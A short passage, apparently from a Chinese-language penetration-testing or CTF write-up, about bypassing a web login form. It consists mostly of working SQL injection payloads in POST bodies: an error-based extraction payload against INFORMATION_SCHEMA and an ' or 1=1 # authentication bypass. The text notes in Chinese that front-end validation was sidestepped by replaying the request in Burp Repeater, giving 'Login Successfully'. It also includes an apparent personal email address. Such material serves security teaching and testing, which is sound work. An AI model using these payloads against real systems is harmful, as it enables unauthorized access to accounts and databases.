Payload: user=admin&email=admin@123' OR (SELECT 9709 FROM(SELECT COUNT(*),CONCAT(0x7170707671,(SELECT (ELT(9709=9709,1))),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nnPx&password=asd&btn_login=
复制代码
我们利用万能密码发现带有前端验证
我们利用burp抓包,利用Repeater确认一下,发现Login Successfully
user=admin&email=ndbhalerao91%40gmail.com' or 1=1 #&password=asd&btn_login=